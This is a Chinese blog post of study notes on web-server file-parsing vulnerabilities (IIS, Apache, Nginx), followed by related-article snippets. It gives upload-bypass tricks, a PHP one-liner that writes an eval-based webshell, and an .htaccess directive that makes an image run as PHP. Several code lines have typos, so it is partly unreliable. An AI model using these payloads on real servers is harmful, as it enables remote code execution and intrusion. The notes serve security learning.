渗透测试之文件解析漏洞

最新推荐文章于 2024-06-13 19:39:02 发布
最新推荐文章于 2024-06-13 19:39:02 发布
阅读量355 收藏 4
点赞数
分类专栏: 笔记 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49091880/article/details/115559870
版权

文件解析漏洞

1.定义:解析漏洞主要说的是一些特殊文件被IIS、apache、Nginx在某种情况下解释成脚本文件格式的漏洞

 

2.IIS 6.0解析方法

第一种方法

目录解析

/xx.asp/xx.jpg

在网站下建立文件夹的名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都

被IIS当做是asp文件来解析执行。

例如创建目录cracer.asp,那么 /cracer.asp/1.jpg

将被当做是asp文件来执行。假设黑阔可以控制上传文件夹路径,那

就可以不管你上传后你的图片改不改名都能拿shell了

 

第二种方法

文件解析

cracer.asp;.jpg

第二种,在IIS 6.0下,分号后面的不被解析,也就是说cracer.asp;.jpg

会被服务器看成是wooyun.asp还有IIS 6.0默认的可执行文件除了asp还包含

三种

(1)/cracer.asa

(2)/cracer.cer

(3)/cracer.cdx

 

Apache解析漏洞

(1) Apache是从右往左开始判断解析

(2)任意不识别的后缀,逐级向上识别

例如:x.php.zzz

 

IIS 7.0/IIS 7.5 /Nginx <8.03畸形解析漏洞

(1)Nginx解析漏洞是我国安全组织80sec发现的FPTUS

(2)在默认Fast-CGI开启状况下,黑阔上传一个名字为cracer.jpg,

内容是<?php fptus(fopen('shell.php','W'),'<?php eval($_POST[cmd])?>');?>

的文件,然后访问carcer.jpg/.php,在这个目录下 会生成一句话木马shell.php

 

Nginx <8.03 空字节代码执行漏洞

(1)影响版本:0.5,0.6,0.7<=0.7.65,0.8<=0.8.37

(2)Nginx在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码

 

htaccess文件

如果在Apache中.htaccess可被执行。且可被上传,那就可以尝试在.htaccess中写入:

<FileMatch"shell.jpg">SetHander application/x-httpd-php </FileMatch>,然后再上传

shell.jpg的木马,这样shell.jpg就可以解析为php文件

 

上传检测流程:通常一个文件以HTTP协议进行上传时,将以POST请求发送至web服务器,

web服务器接收到请求后并同意后,用户与web服务器将建立连接,并传输data

服务器命名规则

(1)第一种类型:上传文件名和服务器命名一致

(2)第二种类型:上传文件名和服务器命名不一致(随机、时间日期命名等)

 

常见的上传检测方式

1.客户端javascript检测(通常为检测文件扩展名)

2.服务端MIME类型检测(检测Contet-Type 内容)

3.服务器目录路径检测(检测跟path参数相关的内容)

4.服务端文件扩展名检测(检测跟文件extension相关的内容)

5.服务端文件内容检测(检测内容是否合法或含有恶意代码)

 

 

持续学习中

墨轩小白
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件解析漏洞总结
2ed
04-09 527
文件解析漏洞,是指Web容器(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件解析。 0x001 IIS解析漏洞 目录解析 在 IIS5.x/6.0 中,在网站下建立文件夹的名字为*.asp、.asa、.cer、*.cdx 的文件夹,其目录内的任何扩展名的文件都被IIS当做asp文件来解释并执行。例如创建目录 test.asp,那么 /test...
WEB安全之文件上传漏洞
qq_56158055的博客
01-15 1909
文件上传漏洞原理 由于开发人员对用户上传文件的部分处理的不够严谨,从而导致用户可以上传恶意文件,并执行这种恶意文件,从而获取执行服务器的权限。 漏洞的危害 获取服务器webshell权限 任意查看、修改、删除、下载对方文件 查看数据库信息 执行命令 挂黑页、木马等 漏洞发现 上传头像的位置 敏感身份认证的位置(身份证等各种证件的照片上传处) 订单反馈的位置(上传照片) 各种能上场文件的地方 注意事项 可解析php的后缀:php,php2,php3,php4,php..
Web渗透测试-常见漏洞解析课件
03-23
Web渗透测试-常见漏洞解析课程的课件,其中包括资源的分享和工具的分享
Linux的shell脚本爬虫实战之图片爬取
wtfsb的博客
09-03 1733
爬虫实战,涉及爬取网页内容,过滤规则的
文件解析漏洞
最新发布
wbplife的博客
06-13 523
该版本默认将*.asp;.jpg 此种格式的文件名,当成Asp解析。服务器默认不解析;号及其后面的内容,相当于截断。iis除了会将asp解析成脚本执行文件之外,还会将 cer cdx asa 扩展名解析成asp;通过文件上传,或者创建文件,格式为*.asp;.jpg在IIS7.0和IIS7.5版本下也存在解析漏洞,在Fast-CGl运行模式下,在一个文件路径 /xx.jpg 后面加上/.php会将 /xx.jpg/.php 解析为php文件。利用条件。
web_安全_文件上传漏洞
weixin_44110913的博客
02-17 326
pass 1 上传文件发现会弹窗提示 然后直接f12找到上传按钮所在的代码,将onsubmint事件删除即可 pass 2 发现上传时提示我们文件不允许上传,猜测是服务器端对文件的mime类型进行了验证 直接抓包修改mime类型为image/jpg,即可上传成功 pass 3 不允许上传.asp,.aspx,.php,.jsp后缀文件,但是可以上传其他任意后缀 .php .phtml .phps...
shell小技巧(七十三)将所有后缀为jpg文件权限改为600
bigwood99的博客
05-08 394
代码: 方法1: find -type f -name "*.jpg" -exec chmod 600{} \; 方法2: chmod 600 *.jpg 总结: 方法1和方法2有少许区别。方法1可以将当前目录下包含子目录所有“*.jpg”权限修改。 方法2则不修改子目录下的“*.jpg文件权限 find有选项maxdepth可以控制执行子目录的深度,下面的命令跟方法2效...
国光师傅文件上传靶场练习
weixin_63231007的博客
04-23 1537
0x01 JS (1)抓包绕过前端检测 因为存在前段验证的问题,所以我们将一句话木马文件shell.php 重命名为 shell.jpg 上传抓包的时候再将文件名修改为 shell.php 即可绕过前段限制,成功上传 webshell。蚁剑连接进入后台。 (2)禁用js 看文章题目可知,使用js来检测后缀。所以我们用js禁用插件禁用js。即可上传php木马文件。 0x02 .htaccess 上传.htaccess文件,写入 AddType application/x-httpd-php .
渗透测试文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
总之,学习和理解文件上传漏洞及其利用与防御方法是渗透测试人员的基本技能,它涉及到服务器配置、文件解析机制、Web应用程序设计等多个层面,只有深入理解这些知识,才能有效保护网站免受此类攻击。
渗透测试环境部署DVWA
10-29
渗透测试是一种合法的安全实践,用于评估网络和系统的防御能力,以发现潜在的漏洞。DVWA(Damn Vulnerable Web Application)是一款专门为渗透测试和安全教育设计的开源Web应用程序。在这个环境中,我们可以模拟各种...
30 天渗透测试练习1.pdf
10-06
8. **Portswigger Academy:XXE(XML外部实体)** - XXE漏洞允许攻击者通过XML解析器获取服务器上的文件,甚至执行服务器端请求伪造(SSRF)。通过这些实验室,你可以学习如何利用和防御XXE攻击。 9. **Portswigger...
web安全攻防实战》——文件上传漏洞之基础篇
fairy1016的博客
09-14 1049
漏洞原理:Webshell webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。 关键函数:以php为例,eval(),执行用户输入的函数。 登录本地的容器账户后,选择未经严格审计的文件上传功能 安全级别选择low,是一个比较低的安全级别,点击 hack。 编辑木马文件
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1264
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
jpg文件当作php文件解析,解析漏洞
weixin_39737233的博客
04-06 1794
[+]IIS 6.01. 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码。(或者在fider里面如果有topath的话尝试,直接加目录传Jpg)比如 在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件解析并执行。例如创建目录 wooyun.asp,那么/wooyu...
php 合并图像,php shell命令合并图片
weixin_42452483的博客
03-17 247
php不仅仅可以用在web环境下喔,它也是一款很不错的shell呢,下面的代码演示如果在shell中使用php合并图片#!/usr/local/bin/php -qauthor:freemouse// 下面是说明.print ("本程序用于合并2张 640x480大小的.\n");print ("图片,并将其转化为一张 400x300 大小的图片\n");print ("需要指定存放合成前图片(a...
文件解析漏洞大全
scu_hacker博客
01-25 6140
目录 前言 一、apache解析漏洞 二、nginx解析漏洞 2.1nginx<8.03 2.2nginx 0.5,0.6,0.7 <= 0.7.65, 0.8 <= 0.8.37 三、IIS解析漏洞 3.1IIS 5.0/6.0 3.2 IIS 6.0 3.3IIS 7.x 四、windows解析漏洞 4.1​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格 ​​​​​​​4.2上传jsp::DATA文件,windows会...
解析漏洞文件上传漏洞学习--2023/03/16-18
m0_53689197的博客
03-18 486
护网学习--2023/03/16-18
渗透测试文件上传漏洞需要收集什么信息
11-14
渗透测试文件上传漏洞需要收集以下信息: 1.上传文件的类型和大小限制。 2.上传文件的保存路径。 3.上传文件的后缀名限制。 4.上传文件的访问权限。 5.上传文件的过滤机制。 6.上传文件解析方式。 7.上传文件的错误信息。 8.上传文件的上传方式(POST或者PUT)。 9.上传文件的上传参数。 10.上传文件的上传页面URL。 渗透测试人员需要通过以上信息来判断文件上传漏洞的存在性,并且利用该漏洞上传恶意文件,从而实现对目标系统的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值